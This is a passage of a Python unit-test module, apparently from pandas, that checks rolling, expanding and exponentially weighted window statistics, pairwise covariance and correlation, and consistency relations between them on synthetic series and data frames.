vals = np.array(range(10), dtype=np.float)
xp = vals.copy()
xp[:2] = np.nan
xp[-2:] = np.nan
xp = Series(xp)
rs = Series(vals).rolling(
5, win_type=win_types_special, center=True).mean(
**kwds[win_types_special])
tm.assert_series_equal(xp, rs)
def test_rolling_median(self):
self._check_moment_func(np.median, name='median')
def test_rolling_min(self):
self._check_moment_func(np.min, name='min')
a = pd.Series([1, 2, 3, 4, 5])
result = a.rolling(window=100, min_periods=1).min()
expected = pd.Series(np.ones(len(a)))
tm.assert_series_equal(result, expected)
with pytest.raises(ValueError):
pd.Series([1, 2, 3]).rolling(window=3, min_periods=5).min()
def test_rolling_max(self):
self._check_moment_func(np.max, name='max')
a = pd.Series([1, 2, 3, 4, 5], dtype=np.float64)
b = a.rolling(window=100, min_periods=1).max()
tm.assert_almost_equal(a, b)
with pytest.raises(ValueError):
pd.Series([1, 2, 3]).rolling(window=3, min_periods=5).max()
@pytest.mark.parametrize('q', [0.0, .1, .5, .9, 1.0])
def test_rolling_quantile(self, q):
def scoreatpercentile(a, per):
values = np.sort(a, axis=0)
idx = int(per / 1. * (values.shape[0] - 1))
if idx == values.shape[0] - 1:
retval = values[-1]
else:
qlow = float(idx) / float(values.shape[0] - 1)
qhig = float(idx + 1) / float(values.shape[0] - 1)
vlow = values[idx]
vhig = values[idx + 1]
retval = vlow + (vhig - vlow) * (per - qlow) / (qhig - qlow)
return retval
def quantile_func(x):
return scoreatpercentile(x, q)
self._check_moment_func(quantile_func, name='quantile',
quantile=q)
def test_rolling_quantile_np_percentile(self):
# #9413: Tests that rolling window's quantile default behavior
# is analogus to Numpy's percentile
row = 10
col = 5
idx = pd.date_range('20100101', periods=row, freq='B')
df = DataFrame(np.random.rand(row * col).reshape((row, -1)), index=idx)
df_quantile = df.quantile([0.25, 0.5, 0.75], axis=0)
np_percentile = np.percentile(df, [25, 50, 75], axis=0)
tm.assert_almost_equal(df_quantile.values, np.array(np_percentile))
@pytest.mark.skipif(_np_version_under1p12,
reason='numpy midpoint interpolation is broken')
@pytest.mark.parametrize('quantile', [0.0, 0.1, 0.45, 0.5, 1])
@pytest.mark.parametrize('interpolation', ['linear', 'lower', 'higher',
'nearest', 'midpoint'])
@pytest.mark.parametrize('data', [[1., 2., 3., 4., 5., 6., 7.],
[8., 1., 3., 4., 5., 2., 6., 7.],
[0., np.nan, 0.2, np.nan, 0.4],
[np.nan, np.nan, np.nan, np.nan],
[np.nan, 0.1, np.nan, 0.3, 0.4, 0.5],
[0.5], [np.nan, 0.7, 0.6]])
def test_rolling_quantile_interpolation_options(self, quantile,
interpolation, data):
# Tests that rolling window's quantile behavior is analogous to
# Series' quantile for each interpolation option
s = Series(data)
q1 = s.quantile(quantile, interpolation)
q2 = s.expanding(min_periods=1).quantile(
quantile, interpolation).iloc[-1]
if np.isnan(q1):
assert np.isnan(q2)
else:
assert q1 == q2
def test_invalid_quantile_value(self):
data = np.arange(5)
s = Series(data)
with pytest.raises(ValueError, match="Interpolation 'invalid'"
" is not supported"):
s.rolling(len(data), min_periods=1).quantile(
0.5, interpolation='invalid')
def test_rolling_quantile_param(self):
ser = Series([0.0, .1, .5, .9, 1.0])
with pytest.raises(ValueError):
ser.rolling(3).quantile(-0.1)
with pytest.raises(ValueError):
ser.rolling(3).quantile(10.0)
with pytest.raises(TypeError):
ser.rolling(3).quantile('foo')
def test_rolling_apply(self, raw):
# suppress warnings about empty slices, as we are deliberately testing
# with a 0-length Series
with warnings.catch_warnings():
warnings.filterwarnings("ignore",
message=".*(empty slice|0 for slice).*",
category=RuntimeWarning)
def f(x):
return x[np.isfinite(x)].mean()
self._check_moment_func(np.mean, name='apply', func=f, raw=raw)
expected = Series([])
result = expected.rolling(10).apply(lambda x: x.mean(), raw=raw)
tm.assert_series_equal(result, expected)
# gh-8080
s = Series([None, None, None])
result = s.rolling(2, min_periods=0).apply(lambda x: len(x), raw=raw)
expected = Series([1., 2., 2.])
tm.assert_series_equal(result, expected)
result = s.rolling(2, min_periods=0).apply(len, raw=raw)
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize('klass', [Series, DataFrame])
@pytest.mark.parametrize(
'method', [lambda x: x.rolling(window=2), lambda x: x.expanding()])
def test_apply_future_warning(self, klass, method):
# gh-5071
s = klass(np.arange(3))
with tm.assert_produces_warning(FutureWarning):
method(s).apply(lambda x: len(x))
def test_rolling_apply_out_of_bounds(self, raw):
# gh-1850
vals = pd.Series([1, 2, 3, 4])
result = vals.rolling(10).apply(np.sum, raw=raw)
assert result.isna().all()
result = vals.rolling(10, min_periods=1).apply(np.sum, raw=raw)
expected = pd.Series([1, 3, 6, 10], dtype=float)
tm.assert_almost_equal(result, expected)
@pytest.mark.parametrize('window', [2, '2s'])
def test_rolling_apply_with_pandas_objects(self, window):
# 5071
df = pd.DataFrame({'A': np.random.randn(5),
'B': np.random.randint(0, 10, size=5)},
index=pd.date_range('20130101', periods=5, freq='s'))
# we have an equal spaced timeseries index
# so simulate removing the first period
def f(x):
if x.index[0] == df.index[0]:
return np.nan
return x.iloc[-1]
result = df.rolling(window).apply(f, raw=False)
expected = df.iloc[2:].reindex_like(df)
tm.assert_frame_equal(result, expected)
with pytest.raises(AttributeError):
df.rolling(window).apply(f, raw=True)
def test_rolling_std(self):
self._check_moment_func(lambda x: np.std(x, ddof=1),
name='std')
self._check_moment_func(lambda x: np.std(x, ddof=0),
name='std', ddof=0)
def test_rolling_std_1obs(self):
vals = pd.Series([1., 2., 3., 4., 5.])
result = vals.rolling(1, min_periods=1).std()
expected = pd.Series([np.nan] * 5)
tm.assert_series_equal(result, expected)
result = vals.rolling(1, min_periods=1).std(ddof=0)
expected = pd.Series([0.] * 5)
tm.assert_series_equal(result, expected)
result = (pd.Series([np.nan, np.nan, 3, 4, 5])
.rolling(3, min_periods=2).std())
assert np.isnan(result[2])
def test_rolling_std_neg_sqrt(self):
# unit test from Bottleneck
# Test move_nanstd for neg sqrt.
a = pd.Series([0.0011448196318903589, 0.00028718669878572767,
0.00028718669878572767, 0.00028718669878572767,
0.00028718669878572767])
b = a.rolling(window=3).std()
assert np.isfinite(b[2:]).all()
b = a.ewm(span=3).std()
assert np.isfinite(b[2:]).all()
def test_rolling_var(self):
self._check_moment_func(lambda x: np.var(x, ddof=1),
name='var')
self._check_moment_func(lambda x: np.var(x, ddof=0),
name='var', ddof=0)
@td.skip_if_no_scipy
def test_rolling_skew(self):
from scipy.stats import skew
self._check_moment_func(lambda x: skew(x, bias=False), name='skew')
@td.skip_if_no_scipy
def test_rolling_kurt(self):
from scipy.stats import kurtosis
self._check_moment_func(lambda x: kurtosis(x, bias=False),
name='kurt')
def _check_moment_func(self, static_comp, name, has_min_periods=True,
has_center=True, has_time_rule=True,
fill_value=None, zero_min_periods_equal=True,
**kwargs):
def get_result(obj, window, min_periods=None, center=False):
r = obj.rolling(window=window, min_periods=min_periods,
center=center)
return getattr(r, name)(**kwargs)
series_result = get_result(self.series, window=50)
assert isinstance(series_result, Series)
tm.assert_almost_equal(series_result.iloc[-1],
static_comp(self.series[-50:]))
frame_result = get_result(self.frame, window=50)
assert isinstance(frame_result, DataFrame)
tm.assert_series_equal(
frame_result.iloc[-1, :],
self.frame.iloc[-50:, :].apply(static_comp, axis=0, raw=raw),
check_names=False)
# check time_rule works
if has_time_rule:
win = 25
minp = 10
series = self.series[::2].resample('B').mean()
frame = self.frame[::2].resample('B').mean()
if has_min_periods:
series_result = get_result(series, window=win,
min_periods=minp)
frame_result = get_result(frame, window=win,
min_periods=minp)
else:
series_result = get_result(series, window=win)
frame_result = get_result(frame, window=win)
last_date = series_result.index[-1]
prev_date = last_date - 24 * offsets.BDay()
trunc_series = self.series[::2].truncate(prev_date, last_date)
trunc_frame = self.frame[::2].truncate(prev_date, last_date)
tm.assert_almost_equal(series_result[-1],
static_comp(trunc_series))
tm.assert_series_equal(frame_result.xs(last_date),
trunc_frame.apply(static_comp, raw=raw),
check_names=False)
# excluding NaNs correctly
obj = Series(randn(50))
obj[:10] = np.NaN
obj[-10:] = np.NaN
if has_min_periods:
result = get_result(obj, 50, min_periods=30)
tm.assert_almost_equal(result.iloc[-1], static_comp(obj[10:-10]))
# min_periods is working correctly
result = get_result(obj, 20, min_periods=15)
assert isna(result.iloc[23])
assert not isna(result.iloc[24])
assert not isna(result.iloc[-6])
assert isna(result.iloc[-5])
obj2 = Series(randn(20))
result = get_result(obj2, 10, min_periods=5)
assert isna(result.iloc[3])
assert notna(result.iloc[4])
if zero_min_periods_equal:
# min_periods=0 may be equivalent to min_periods=1
result0 = get_result(obj, 20, min_periods=0)
result1 = get_result(obj, 20, min_periods=1)
tm.assert_almost_equal(result0, result1)
else:
result = get_result(obj, 50)
tm.assert_almost_equal(result.iloc[-1], static_comp(obj[10:-10]))
# window larger than series length (#7297)
if has_min_periods:
for minp in (0, len(self.series) - 1, len(self.series)):
result = get_result(self.series, len(self.series) + 1,
min_periods=minp)
expected = get_result(self.series, len(self.series),
min_periods=minp)
nan_mask = isna(result)
tm.assert_series_equal(nan_mask, isna(expected))
nan_mask = ~nan_mask
tm.assert_almost_equal(result[nan_mask],
expected[nan_mask])
else:
result = get_result(self.series, len(self.series) + 1)
expected = get_result(self.series, len(self.series))
nan_mask = isna(result)
tm.assert_series_equal(nan_mask, isna(expected))
nan_mask = ~nan_mask
tm.assert_almost_equal(result[nan_mask], expected[nan_mask])
# check center=True
if has_center:
if has_min_periods:
result = get_result(obj, 20, min_periods=15, center=True)
expected = get_result(
pd.concat([obj, Series([np.NaN] * 9)]), 20,
min_periods=15)[9:].reset_index(drop=True)
else:
result = get_result(obj, 20, center=True)
expected = get_result(
pd.concat([obj, Series([np.NaN] * 9)]),
20)[9:].reset_index(drop=True)
tm.assert_series_equal(result, expected)
# shifter index
s = ['x%d' % x for x in range(12)]
if has_min_periods:
minp = 10
series_xp = get_result(
self.series.reindex(list(self.series.index) + s),
window=25,
min_periods=minp).shift(-12).reindex(self.series.index)
frame_xp = get_result(
self.frame.reindex(list(self.frame.index) + s),
window=25,
min_periods=minp).shift(-12).reindex(self.frame.index)
series_rs = get_result(self.series, window=25,
min_periods=minp, center=True)
frame_rs = get_result(self.frame, window=25, min_periods=minp,
center=True)
else:
series_xp = get_result(
self.series.reindex(list(self.series.index) + s),
window=25).shift(-12).reindex(self.series.index)
frame_xp = get_result(
self.frame.reindex(list(self.frame.index) + s),
window=25).shift(-12).reindex(self.frame.index)
series_rs = get_result(self.series, window=25, center=True)
frame_rs = get_result(self.frame, window=25, center=True)
if fill_value is not None:
series_xp = series_xp.fillna(fill_value)
frame_xp = frame_xp.fillna(fill_value)
tm.assert_series_equal(series_xp, series_rs)
tm.assert_frame_equal(frame_xp, frame_rs)
def test_ewma(self):
self._check_ew(name='mean')
vals = pd.Series(np.zeros(1000))
vals[5] = 1
result = vals.ewm(span=100, adjust=False).mean().sum()
assert np.abs(result - 1) < 1e-2
@pytest.mark.parametrize('adjust', [True, False])
@pytest.mark.parametrize('ignore_na', [True, False])
def test_ewma_cases(self, adjust, ignore_na):
# try adjust/ignore_na args matrix
s = Series([1.0, 2.0, 4.0, 8.0])
if adjust:
expected = Series([1.0, 1.6, 2.736842, 4.923077])
else:
expected = Series([1.0, 1.333333, 2.222222, 4.148148])
result = s.ewm(com=2.0, adjust=adjust, ignore_na=ignore_na).mean()
tm.assert_series_equal(result, expected)
def test_ewma_nan_handling(self):
s = Series([1.] + [np.nan] * 5 + [1.])
result = s.ewm(com=5).mean()
tm.assert_series_equal(result, Series([1.] * len(s)))
s = Series([np.nan] * 2 + [1.] + [np.nan] * 2 + [1.])
result = s.ewm(com=5).mean()
tm.assert_series_equal(result, Series([np.nan] * 2 + [1.] * 4))
# GH 7603
s0 = Series([np.nan, 1., 101.])
s1 = Series([1., np.nan, 101.])
s2 = Series([np.nan, 1., np.nan, np.nan, 101., np.nan])
s3 = Series([1., np.nan, 101., 50.])
com = 2.
alpha = 1. / (1. + com)
def simple_wma(s, w):
return (s.multiply(w).cumsum() / w.cumsum()).fillna(method='ffill')
for (s, adjust, ignore_na, w) in [
(s0, True, False, [np.nan, (1. - alpha), 1.]),
(s0, True, True, [np.nan, (1. - alpha), 1.]),
(s0, False, False, [np.nan, (1. - alpha), alpha]),
(s0, False, True, [np.nan, (1. - alpha), alpha]),
(s1, True, False, [(1. - alpha) ** 2, np.nan, 1.]),
(s1, True, True, [(1. - alpha), np.nan, 1.]),
(s1, False, False, [(1. - alpha) ** 2, np.nan, alpha]),
(s1, False, True, [(1. - alpha), np.nan, alpha]),
(s2, True, False, [np.nan, (1. - alpha) **
3, np.nan, np.nan, 1., np.nan]),
(s2, True, True, [np.nan, (1. - alpha),
np.nan, np.nan, 1., np.nan]),
(s2, False, False, [np.nan, (1. - alpha) **
3, np.nan, np.nan, alpha, np.nan]),
(s2, False, True, [np.nan, (1. - alpha),
np.nan, np.nan, alpha, np.nan]),
(s3, True, False, [(1. - alpha) **
3, np.nan, (1. - alpha), 1.]),
(s3, True, True, [(1. - alpha) **
2, np.nan, (1. - alpha), 1.]),
(s3, False, False, [(1. - alpha) ** 3, np.nan,
(1. - alpha) * alpha,
alpha * ((1. - alpha) ** 2 + alpha)]),
(s3, False, True, [(1. - alpha) ** 2,
np.nan, (1. - alpha) * alpha, alpha])]:
expected = simple_wma(s, Series(w))
result = s.ewm(com=com, adjust=adjust, ignore_na=ignore_na).mean()
tm.assert_series_equal(result, expected)
if ignore_na is False:
# check that ignore_na defaults to False
result = s.ewm(com=com, adjust=adjust).mean()
tm.assert_series_equal(result, expected)
def test_ewmvar(self):
self._check_ew(name='var')
def test_ewmvol(self):
self._check_ew(name='vol')
def test_ewma_span_com_args(self):
A = self.series.ewm(com=9.5).mean()
B = self.series.ewm(span=20).mean()
tm.assert_almost_equal(A, B)
with pytest.raises(ValueError):
self.series.ewm(com=9.5, span=20)
with pytest.raises(ValueError):
self.series.ewm().mean()
def test_ewma_halflife_arg(self):
A = self.series.ewm(com=13.932726172912965).mean()
B = self.series.ewm(halflife=10.0).mean()
tm.assert_almost_equal(A, B)
with pytest.raises(ValueError):
self.series.ewm(span=20, halflife=50)
with pytest.raises(ValueError):
self.series.ewm(com=9.5, halflife=50)
with pytest.raises(ValueError):
self.series.ewm(com=9.5, span=20, halflife=50)
with pytest.raises(ValueError):
self.series.ewm()
def test_ewm_alpha(self):
# GH 10789
s = Series(self.arr)
a = s.ewm(alpha=0.61722699889169674).mean()
b = s.ewm(com=0.62014947789973052).mean()
c = s.ewm(span=2.240298955799461).mean()
d = s.ewm(halflife=0.721792864318).mean()
tm.assert_series_equal(a, b)
tm.assert_series_equal(a, c)
tm.assert_series_equal(a, d)
def test_ewm_alpha_arg(self):
# GH 10789
s = self.series
with pytest.raises(ValueError):
s.ewm()
with pytest.raises(ValueError):
s.ewm(com=10.0, alpha=0.5)
with pytest.raises(ValueError):
s.ewm(span=10.0, alpha=0.5)
with pytest.raises(ValueError):
s.ewm(halflife=10.0, alpha=0.5)
def test_ewm_domain_checks(self):
# GH 12492
s = Series(self.arr)
# com must satisfy: com >= 0
pytest.raises(ValueError, s.ewm, com=-0.1)
s.ewm(com=0.0)
s.ewm(com=0.1)
# span must satisfy: span >= 1
pytest.raises(ValueError, s.ewm, span=-0.1)
pytest.raises(ValueError, s.ewm, span=0.0)
pytest.raises(ValueError, s.ewm, span=0.9)
s.ewm(span=1.0)
s.ewm(span=1.1)
# halflife must satisfy: halflife > 0
pytest.raises(ValueError, s.ewm, halflife=-0.1)
pytest.raises(ValueError, s.ewm, halflife=0.0)
s.ewm(halflife=0.1)
# alpha must satisfy: 0 < alpha <= 1
pytest.raises(ValueError, s.ewm, alpha=-0.1)
pytest.raises(ValueError, s.ewm, alpha=0.0)
s.ewm(alpha=0.1)
s.ewm(alpha=1.0)
pytest.raises(ValueError, s.ewm, alpha=1.1)
@pytest.mark.parametrize('method', ['mean', 'vol', 'var'])
def test_ew_empty_series(self, method):
vals = pd.Series([], dtype=np.float64)
ewm = vals.ewm(3)
result = getattr(ewm, method)()
tm.assert_almost_equal(result, vals)
def _check_ew(self, name=None, preserve_nan=False):
series_result = getattr(self.series.ewm(com=10), name)()
assert isinstance(series_result, Series)
frame_result = getattr(self.frame.ewm(com=10), name)()
assert type(frame_result) == DataFrame
result = getattr(self.series.ewm(com=10), name)()
if preserve_nan:
assert result[self._nan_locs].isna().all()
# excluding NaNs correctly
arr = randn(50)
arr[:10] = np.NaN
arr[-10:] = np.NaN
s = Series(arr)
# check min_periods
# GH 7898
result = getattr(s.ewm(com=50, min_periods=2), name)()
assert result[:11].isna().all()
assert not result[11:].isna().any()
for min_periods in (0, 1):
result = getattr(s.ewm(com=50, min_periods=min_periods), name)()
if name == 'mean':
assert result[:10].isna().all()
assert not result[10:].isna().any()
else:
# ewm.std, ewm.vol, ewm.var (with bias=False) require at least
# two values
assert result[:11].isna().all()
assert not result[11:].isna().any()
# check series of length 0
result = getattr(Series().ewm(com=50, min_periods=min_periods),
name)()
tm.assert_series_equal(result, Series())
# check series of length 1
result = getattr(Series([1.]).ewm(50, min_periods=min_periods),
name)()
if name == 'mean':
tm.assert_series_equal(result, Series([1.]))
else:
# ewm.std, ewm.vol, ewm.var with bias=False require at least
# two values
tm.assert_series_equal(result, Series([np.NaN]))
# pass in ints
result2 = getattr(Series(np.arange(50)).ewm(span=10), name)()
assert result2.dtype == np.float_
class TestPairwise(object):
# GH 7738
df1s = [DataFrame([[2, 4], [1, 2], [5, 2], [8, 1]], columns=[0, 1]),
DataFrame([[2, 4], [1, 2], [5, 2], [8, 1]], columns=[1, 0]),
DataFrame([[2, 4], [1, 2], [5, 2], [8, 1]], columns=[1, 1]),
DataFrame([[2, 4], [1, 2], [5, 2], [8, 1]],
columns=['C', 'C']),
DataFrame([[2, 4], [1, 2], [5, 2], [8, 1]], columns=[1., 0]),
DataFrame([[2, 4], [1, 2], [5, 2], [8, 1]], columns=[0., 1]),
DataFrame([[2, 4], [1, 2], [5, 2], [8, 1]], columns=['C', 1]),
DataFrame([[2., 4.], [1., 2.], [5., 2.], [8., 1.]],
columns=[1, 0.]),
DataFrame([[2, 4.], [1, 2.], [5, 2.], [8, 1.]],
columns=[0, 1.]),
DataFrame([[2, 4], [1, 2], [5, 2], [8, 1.]],
columns=[1., 'X']), ]
df2 = DataFrame([[None, 1, 1], [None, 1, 2],
[None, 3, 2], [None, 8, 1]], columns=['Y', 'Z', 'X'])
s = Series([1, 1, 3, 8])
def compare(self, result, expected):
# since we have sorted the results
# we can only compare non-nans
result = result.dropna().values
expected = expected.dropna().values
tm.assert_numpy_array_equal(result, expected, check_dtype=False)
@pytest.mark.parametrize('f', [lambda x: x.cov(), lambda x: x.corr()])
def test_no_flex(self, f):
# DataFrame methods (which do not call _flex_binary_moment())
results = [f(df) for df in self.df1s]
for (df, result) in zip(self.df1s, results):
tm.assert_index_equal(result.index, df.columns)
tm.assert_index_equal(result.columns, df.columns)
for i, result in enumerate(results):
if i > 0:
self.compare(result, results[0])
@pytest.mark.parametrize(
'f', [lambda x: x.expanding().cov(pairwise=True),
lambda x: x.expanding().corr(pairwise=True),
lambda x: x.rolling(window=3).cov(pairwise=True),
lambda x: x.rolling(window=3).corr(pairwise=True),
lambda x: x.ewm(com=3).cov(pairwise=True),
lambda x: x.ewm(com=3).corr(pairwise=True)])
def test_pairwise_with_self(self, f):
# DataFrame with itself, pairwise=True
# note that we may construct the 1st level of the MI
# in a non-motononic way, so compare accordingly
results = []
for i, df in enumerate(self.df1s):
result = f(df)
tm.assert_index_equal(result.index.levels[0],
df.index,
check_names=False)
tm.assert_numpy_array_equal(safe_sort(result.index.levels[1]),
safe_sort(df.columns.unique()))
tm.assert_index_equal(result.columns, df.columns)
results.append(df)
for i, result in enumerate(results):
if i > 0:
self.compare(result, results[0])
@pytest.mark.parametrize(
'f', [lambda x: x.expanding().cov(pairwise=False),
lambda x: x.expanding().corr(pairwise=False),
lambda x: x.rolling(window=3).cov(pairwise=False),
lambda x: x.rolling(window=3).corr(pairwise=False),
lambda x: x.ewm(com=3).cov(pairwise=False),
lambda x: x.ewm(com=3).corr(pairwise=False), ])
def test_no_pairwise_with_self(self, f):
# DataFrame with itself, pairwise=False
results = [f(df) for df in self.df1s]
for (df, result) in zip(self.df1s, results):
tm.assert_index_equal(result.index, df.index)
tm.assert_index_equal(result.columns, df.columns)
for i, result in enumerate(results):
if i > 0:
self.compare(result, results[0])
@pytest.mark.parametrize(
'f', [lambda x, y: x.expanding().cov(y, pairwise=True),
lambda x, y: x.expanding().corr(y, pairwise=True),
lambda x, y: x.rolling(window=3).cov(y, pairwise=True),
lambda x, y: x.rolling(window=3).corr(y, pairwise=True),
lambda x, y: x.ewm(com=3).cov(y, pairwise=True),
lambda x, y: x.ewm(com=3).corr(y, pairwise=True), ])
def test_pairwise_with_other(self, f):
# DataFrame with another DataFrame, pairwise=True
results = [f(df, self.df2) for df in self.df1s]
for (df, result) in zip(self.df1s, results):
tm.assert_index_equal(result.index.levels[0],
df.index,
check_names=False)
tm.assert_numpy_array_equal(safe_sort(result.index.levels[1]),
safe_sort(self.df2.columns.unique()))
for i, result in enumerate(results):
if i > 0:
self.compare(result, results[0])
@pytest.mark.parametrize(
'f', [lambda x, y: x.expanding().cov(y, pairwise=False),
lambda x, y: x.expanding().corr(y, pairwise=False),
lambda x, y: x.rolling(window=3).cov(y, pairwise=False),
lambda x, y: x.rolling(window=3).corr(y, pairwise=False),
lambda x, y: x.ewm(com=3).cov(y, pairwise=False),
lambda x, y: x.ewm(com=3).corr(y, pairwise=False), ])
def test_no_pairwise_with_other(self, f):
# DataFrame with another DataFrame, pairwise=False
results = [f(df, self.df2) if df.columns.is_unique else None
for df in self.df1s]
for (df, result) in zip(self.df1s, results):
if result is not None:
with catch_warnings(record=True):
# we can have int and str columns
expected_index = df.index.union(self.df2.index)
expected_columns = df.columns.union(self.df2.columns)
tm.assert_index_equal(result.index, expected_index)
tm.assert_index_equal(result.columns, expected_columns)
else:
tm.assert_raises_regex(
ValueError, "'arg1' columns are not unique", f, df,
self.df2)
tm.assert_raises_regex(
ValueError, "'arg2' columns are not unique", f,
self.df2, df)
@pytest.mark.parametrize(
'f', [lambda x, y: x.expanding().cov(y),
lambda x, y: x.expanding().corr(y),
lambda x, y: x.rolling(window=3).cov(y),
lambda x, y: x.rolling(window=3).corr(y),
lambda x, y: x.ewm(com=3).cov(y),
lambda x, y: x.ewm(com=3).corr(y), ])
def test_pairwise_with_series(self, f):
# DataFrame with a Series
results = ([f(df, self.s) for df in self.df1s] +
[f(self.s, df) for df in self.df1s])
for (df, result) in zip(self.df1s, results):
tm.assert_index_equal(result.index, df.index)
tm.assert_index_equal(result.columns, df.columns)
for i, result in enumerate(results):
if i > 0:
self.compare(result, results[0])
# create the data only once as we are not setting it
def _create_consistency_data():
def create_series():
return [Series(),
Series([np.nan]),
Series([np.nan, np.nan]),
Series([3.]),
Series([np.nan, 3.]),
Series([3., np.nan]),
Series([1., 3.]),
Series([2., 2.]),
Series([3., 1.]),
Series([5., 5., 5., 5., np.nan, np.nan, np.nan, 5., 5., np.nan,
np.nan]),
Series([np.nan, 5., 5., 5., np.nan, np.nan, np.nan, 5., 5.,
np.nan, np.nan]),
Series([np.nan, np.nan, 5., 5., np.nan, np.nan, np.nan, 5., 5.,
np.nan, np.nan]),
Series([np.nan, 3., np.nan, 3., 4., 5., 6., np.nan, np.nan, 7.,
12., 13., 14., 15.]),
Series([np.nan, 5., np.nan, 2., 4., 0., 9., np.nan, np.nan, 3.,
12., 13., 14., 15.]),
Series([2., 3., np.nan, 3., 4., 5., 6., np.nan, np.nan, 7.,
12., 13., 14., 15.]),
Series([2., 5., np.nan, 2., 4., 0., 9., np.nan, np.nan, 3.,
12., 13., 14., 15.]),
Series(range(10)),
Series(range(20, 0, -2)), ]
def create_dataframes():
return ([DataFrame(),
DataFrame(columns=['a']),
DataFrame(columns=['a', 'a']),
DataFrame(columns=['a', 'b']),
DataFrame(np.arange(10).reshape((5, 2))),
DataFrame(np.arange(25).reshape((5, 5))),
DataFrame(np.arange(25).reshape((5, 5)),
columns=['a', 'b', 99, 'd', 'd'])] +
[DataFrame(s) for s in create_series()])
def is_constant(x):
values = x.values.ravel()
return len(set(values[notna(values)])) == 1
def no_nans(x):
return x.notna().all().all()
# data is a tuple(object, is_contant, no_nans)
data = create_series() + create_dataframes()
return [(x, is_constant(x), no_nans(x)) for x in data]
_consistency_data = _create_consistency_data()
def _rolling_consistency_cases():
for window in [1, 2, 3, 10, 20]:
for min_periods in set([0, 1, 2, 3, 4, window]):
if min_periods and (min_periods > window):
continue
for center in [False, True]:
yield window, min_periods, center
class TestMomentsConsistency(Base):
base_functions = [
(lambda v: Series(v).count(), None, 'count'),
(lambda v: Series(v).max(), None, 'max'),
(lambda v: Series(v).min(), None, 'min'),
(lambda v: Series(v).sum(), None, 'sum'),
(lambda v: Series(v).mean(), None, 'mean'),
(lambda v: Series(v).std(), 1, 'std'),
(lambda v: Series(v).cov(Series(v)), None, 'cov'),
(lambda v: Series(v).corr(Series(v)), None, 'corr'),
(lambda v: Series(v).var(), 1, 'var'),
# restore once GH 8086 is fixed
# lambda v: Series(v).skew(), 3, 'skew'),
# (lambda v: Series(v).kurt(), 4, 'kurt'),
# restore once GH 8084 is fixed
# lambda v: Series(v).quantile(0.3), None, 'quantile'),
(lambda v: Series(v).median(), None, 'median'),
(np.nanmax, 1, 'max'),
(np.nanmin, 1, 'min'),
(np.nansum, 1, 'sum'),
(np.nanmean, 1, 'mean'),
(lambda v: np.nanstd(v, ddof=1), 1, 'std'),
(lambda v: np.nanvar(v, ddof=1), 1, 'var'),
(np.nanmedian, 1, 'median'),
]
no_nan_functions = [
(np.max, None, 'max'),
(np.min, None, 'min'),
(np.sum, None, 'sum'),
(np.mean, None, 'mean'),
(lambda v: np.std(v, ddof=1), 1, 'std'),
(lambda v: np.var(v, ddof=1), 1, 'var'),
(np.median, None, 'median'),
]
def _create_data(self):
super(TestMomentsConsistency, self)._create_data()
self.data = _consistency_data
def setup_method(self, method):
self._create_data()
def _test_moments_consistency(self, min_periods, count, mean, mock_mean,
corr, var_unbiased=None, std_unbiased=None,
cov_unbiased=None, var_biased=None,
std_biased=None, cov_biased=None,
var_debiasing_factors=None):
def _non_null_values(x):
values = x.values.ravel()
return set(values[notna(values)].tolist())
for (x, is_constant, no_nans) in self.data:
count_x = count(x)
mean_x = mean(x)
if mock_mean:
# check that mean equals mock_mean
expected = mock_mean(x)
assert_equal(mean_x, expected.astype('float64'))
# check that correlation of a series with itself is either 1 or NaN
corr_x_x = corr(x, x)
# assert _non_null_values(corr_x_x).issubset(set([1.]))
# restore once rolling_cov(x, x) is identically equal to var(x)
if is_constant:
exp = x.max() if isinstance(x, Series) else x.max().max()
# check mean of constant series
expected = x * np.nan
expected[count_x >= max(min_periods, 1)] = exp
assert_equal(mean_x, expected)
# check correlation of constant series with itself is NaN
expected[:] = np.nan
assert_equal(corr_x_x, expected)
if var_unbiased and var_biased and var_debiasing_factors:
# check variance debiasing factors
var_unbiased_x = var_unbiased(x)
var_biased_x = var_biased(x)
var_debiasing_factors_x = var_debiasing_factors(x)
assert_equal(var_unbiased_x, var_biased_x *
var_debiasing_factors_x)
for (std, var, cov) in [(std_biased, var_biased, cov_biased),
(std_unbiased, var_unbiased, cov_unbiased)
]:
# check that var(x), std(x), and cov(x) are all >= 0
var_x = var(x)
std_x = std(x)
assert not (var_x < 0).any().any()
assert not (std_x < 0).any().any()
if cov:
cov_x_x = cov(x, x)
assert not (cov_x_x < 0).any().any()
# check that var(x) == cov(x, x)
assert_equal(var_x, cov_x_x)
# check that var(x) == std(x)^2
assert_equal(var_x, std_x * std_x)
if var is var_biased:
# check that biased var(x) == mean(x^2) - mean(x)^2
mean_x2 = mean(x * x)
assert_equal(var_x, mean_x2 - (mean_x * mean_x))
if is_constant:
# check that variance of constant series is identically 0
assert not (var_x > 0).any().any()
expected = x * np.nan
expected[count_x >= max(min_periods, 1)] = 0.
if var is var_unbiased:
expected[count_x < 2] = np.nan
assert_equal(var_x, expected)
if isinstance(x, Series):
for (y, is_constant, no_nans) in self.data:
if not x.isna().equals(y.isna()):
# can only easily test two Series with similar
# structure
continue
# check that cor(x, y) is symmetric
corr_x_y = corr(x, y)
corr_y_x = corr(y, x)
assert_equal(corr_x_y, corr_y_x)
if cov:
# check that cov(x, y) is symmetric
cov_x_y = cov(x, y)
cov_y_x = cov(y, x)
assert_equal(cov_x_y, cov_y_x)
# check that cov(x, y) == (var(x+y) - var(x) -
# var(y)) / 2
var_x_plus_y = var(x + y)
var_y = var(y)
assert_equal(cov_x_y, 0.5 *
(var_x_plus_y - var_x - var_y))
# check that corr(x, y) == cov(x, y) / (std(x) *
# std(y))
std_y = std(y)
assert_equal(corr_x_y, cov_x_y / (std_x * std_y))
if cov is cov_biased:
# check that biased cov(x, y) == mean(x*y) -
# mean(x)*mean(y)
mean_y = mean(y)
mean_x_times_y = mean(x * y)
assert_equal(cov_x_y, mean_x_times_y -
(mean_x * mean_y))
@pytest.mark.slow
@pytest.mark.parametrize('min_periods', [0, 1, 2, 3, 4])
@pytest.mark.parametrize('adjust', [True, False])
@pytest.mark.parametrize('ignore_na', [True, False])
def test_ewm_consistency(self, min_periods, adjust, ignore_na):
def _weights(s, com, adjust, ignore_na):
if isinstance(s, DataFrame):
if not len(s.columns):
return DataFrame(index=s.index, columns=s.columns)
w = concat([
_weights(s.iloc[:, i], com=com, adjust=adjust,
ignore_na=ignore_na)
for i, _ in enumerate(s.columns)], axis=1)
w.index = s.index
w.columns = s.columns
return w
w = Series(np.nan, index=s.index)
alpha = 1. / (1. + com)
if ignore_na:
